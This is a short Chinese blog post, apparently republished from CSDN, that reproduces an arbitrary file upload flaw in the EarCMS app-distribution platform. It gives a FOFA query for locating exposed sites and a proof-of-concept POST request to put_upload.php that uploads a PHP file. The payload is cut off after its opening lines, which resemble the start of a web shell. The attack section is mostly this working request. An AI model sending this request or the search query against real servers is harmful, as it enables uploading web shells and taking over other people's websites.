EarCMS 前台任意文件上传漏洞复现
2023-12-13 07:14:09
0x01 产品简介
EarCMS是一个APP内测分发系统的平台。
0x02 漏洞概述
EarCMS前台put_upload.php中,存在pw参数硬编码问题,同时sql语句pdo使用错误,没有有效过滤sql语句,可以控制文件名和后缀,导致可以任意文件上传。
0x03 复现环境
FOFA:app="EearCMS"
0x04 漏洞复现
PoC
POST /source/index/put_upload.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data;boundary=---------------------------141225804626496209592978386925
Accept-Encoding: gzip
Connection: close
-----------------------------141225804626496209592978386925
Content-Disposition: form-data; name="ipa"; filename="666"
Content-Type: application/x-msdownload
<?php
@session_start();
@set_time_l
文章来源:https://blog.csdn.net/qq_41904294/article/details/134864387
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!